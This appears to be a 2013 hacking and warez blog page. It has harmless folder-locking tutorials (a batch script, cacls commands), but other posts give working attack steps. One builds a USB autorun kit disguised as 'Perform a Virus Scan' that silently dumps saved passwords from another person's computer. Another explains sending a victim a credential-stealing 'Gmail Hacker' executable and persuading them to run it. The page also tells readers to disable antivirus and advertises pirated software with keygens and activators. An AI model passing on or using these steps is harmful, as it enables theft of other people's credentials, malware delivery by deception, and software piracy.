Get me outta here!

Friday, 22 November 2013

Protect Folder With Password without using software in Windows 7

This tutorial will guide you through the steps required to create a locked folder in Windows 7 – without installing any additional 3rd party software.
While the steps below will guide you in creating a hidden and password protected folder, this method is not 100% secure. It will deter the average computer user enough, but an advanced user will be able to access the contents of this folder. If you want to create a truly secure and encrypted place to store files and folders that absolutely nobody will ever be able to access, see the tutorial How to Securely Store Files in Windows.
  1. Create a new folder and name it whatever you would like.
  2. Open the folder, right-click on a blank area in it, then select New -> Text Document from the pop-up menu.
  3. Open the text file you just created by double-clicking it and copy/paste in the following text:
    cls
    @ECHO OFF
    title Folder Private
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
    if NOT EXIST Private goto MDLOCKER
    :CONFIRM
    echo Are you sure you want to lock the folder(Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to unlock folder
    set/p "pass=>"
    if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDLOCKER
    md Private
    echo Private created successfully
    goto End
    :End
  4. In the above code, replace the key PASSWORD_GOES_HERE with the password you want to use to unlock the folder. For example if you want the password to be 123456, the line should look like:
    if NOT %pass%== 123456 goto FAIL
  5. Save your new file in the .bat format with the complete file name being locker.bat. To do this, make sure to change the Save as type: to All Files (*.*).
  6. In the folder you created back in Step #1, double click the locker.bat file and there will now be a new folder named Private where you can put anything you want.
  7. Upon exiting, double click the locker.bat file again. It will prompt you to answer whether you want to lock your folder or not. Press Y and the private folder will disappear.
  8. In order to retrieve the Private folder, all you have to do is double click the locker.bat file and enter the password which you set in Step #4 and the folder will appear again for you to access.

  9. That’s it!

Tuesday, 19 November 2013

Hack Password using USB Drive



Hello Friends, Today i will show you how to hack or actually sniff the save password from computer by just using an usb drive..
I know you Can't Believe..But yes you can...

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassViewRecovers the passwords of the following email programs: Outlook Express, MicrosoftOutlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista (i will try to find windows 7 don't worry guys)

Friday, 15 November 2013

How to lock a Folder using Command Prompt



How to lock a Folder using Command Prompt :-
Command prompt is one of the most powerful application in windows OS. If you have knowledge about Command prompt means you have knowledge about Windows OS in proper way. If you are familiar with command, you can easily done your work on any windows OS with less effort.
Today I am going to show you how easily you can lock a folder using command prompt in few commands and if you did same thing GUI, it will takes more effort.
First open the command prompt (start menu > cmd ) with Run as administrator.
How-to-lock-a-Folder-using-Command-Prompt
Now I want to create a folder in D drive, so on the command prompt Change your Directory to D drive and create a folder with mkdir command.

I create a Folder named pctricks in the D drive. If you want to view your folder then enter the command dir on the same prompt.
Now on the same command prompt, enter the command
D:\>cacls D:\yourfoldername /e /p everyone:n
How-to-lock-a-Folder-using-Command-Prompt4
Now when you open a Folder, you will get the access denied error. To open this folder you need a administrator permission and click on the continue.

Now if you want to know what that small command did, Right-click on theFolder > Properties > Security tab. here you will see the Deny permission to everyone.
How-to-lock-a-Folder-using-Command-Prompt3
Now if you want to remove the restrictions then enter the command
D:\>cacls D:\yourfoldername /e /p everyone:f
Here you only changed the last value. you replace the no value to false value.
If you are thinking How this trick is effective to you ? Suppose you have 2-3 users in your PC and you want to put the restrictions on your folder so other users are not able to seen your folder contents. in this condition it,s effective for you.
You can easily find out the User on your System with net user command on the command prompt. As you seen in below image my pc have four users named Administrator , Guest, Software and test.

Now suppose you want to put the restrictions for Software user then replace the everyone to Software.
D:\>cacls D:\yourfoldername /e /p Software:n

Enjoy your Folder restrictions without any software.
Hope you like my post.How to lock a Folder using Command Prompt. Please Share with others.

Monday, 11 November 2013

Hacking Gmail Account Password using Gmail Hacker Software




This is the Simplest way of hacking gmail password, However this may not work for some people because most  Antivirus software’s easily recognizes this ‘Gmail Hacker software’. This trick involves creating a special .exe file and sending it to the Victim. and when he or she runs this ‘Gmail hacker software’ you will get the Username and Password to your “Gmail Inbox”. This Trick requires you to have ‘Microsoft’s .net Framework‘, if you dont have please download and install it.

-Follow the Step by Step Tutorials below to hack Gmail Account Password:
Step 1: Download ‘Gmail hacker’ Software (extract the file to desktop). If your Antivirus deletes the file, then please turnoff your Antivirus or uninstall it and try downloading again.
Step 2: Run ‘Gmail hacker Bulder.exe’ file and enter your gmail account details, so that the password of your victim can be mailed to you. If you are afraid of entering your gmail details, then do create one fake account and enter those details.
1 Hacking Gmail Account Password using Gmail Hacker Software
Step 3: After you enter your ‘Gmail account’ details Click on ‘Build’. Now the Gmail Hacker will Clone itself, ie it will create another file called ‘Gmail Hacker.exe’ and will save it in the same folder.
Step 4: Now Send the ‘Gmail Hacker.exe’ file that you just created to your Victim Via email or Upload it to any File sharing website for eg: box.net, Rapidshare, etc and send the link via chat or email.
Ask the Victim to try that software to hack others email and some how convince him to run that software and enter all information (which includes his Gmail id and password plus Gmail ID of the victim he want to hack).
2 Hacking Gmail Account Password using Gmail Hacker Software
When he enters the required information and hits the ‘hack them’ Button, he will receive an error message as shown below and The Username and Password will be mailed to your Gmail Id (that you Specified in Step 2)

Download Gmail Hacker Here



Aurora 3D Animation Maker 13.01.04 Incl Keygen

Aurora 3D Animation Maker 13.01.04 Incl Key gen

Features:
Key-Frame Animation:
Using just a single timeline, you will be able to control all aspects of your animation, including the length, playback speed, and more.

Particles Effects:
You will have a more splendid scene effects, such as space radiation, rain, snow, fireworks, smoke, etc., with these, you are free to improve the scenes, when you need to attract the eye.

Internal Animation Style:
Every object can have many types of animations, such as rotate, swing, beat, wave, fade, typewriter, pulse.

3D Manipulator:
Drag the button at the right-bottom of an object, and you can extrude the text or shape.
You can control the object position, rotate and scale at X/Y/Z.

Animation Templates:
Get a lot of 3D title and logo templates. Make you own 3D title animation in minutes for web and movie. Don’t need the basic of 3D Design.

Installation Steps:
1. Extract rar
2. Install Aurora 3D Animation Maker (do not run the program)
3. Run Keygen > "Product" set to: Aurora 3D Animation Maker v11.0 > "Registry info": enter you name > Click genrenare > Click Patch > Search Animation3D.exe (C:\Program Files\Aurora3D\Animation3D) > Click Open
4. Run Aurora 3D Animation program > Register the program:
   - Registry Info: Enter you name (from keygen)
   - User name    : Enter whatever you want
   - User Email   : Enter you Email
   - Serial key   : Paste serial key (from keygen)
5. Support the software developers.

Microsoft Office Select Edition 2013 15.0.4420.1017 VL Incl Activator

Microsoft Office Select Edition 2013
Microsoft Office Select Edition 2013 Activator - MS Office Full Download

Microsoft Office Select Edition 2013 15.0.4420.1017 VL Incl Activator Only By THE RAIN| 5.6 Gb

Microsoft Office Select Edition 2013 15.0.4420.1017 VL (RU-EN) (64bit) Incl Activator Microsoft's recently introduced a software package Microsoft Office 2013.

ZoneAlarm Pro Firewall v.12.0.104.000

ZoneAlarm

Download ZoneAlarm Pro Firewall - Full Version

ZoneAlarm Pro Firewall 12.0.104.000
SIZE: 36.8 MB

Whats New in This Release
New: Windows 8.1 support.
Updated: Antivirus engine.
Improved: AV detection.

Enabling | reg code: Key
Language: English
Platform / OS: Windows XP/Vista/7/8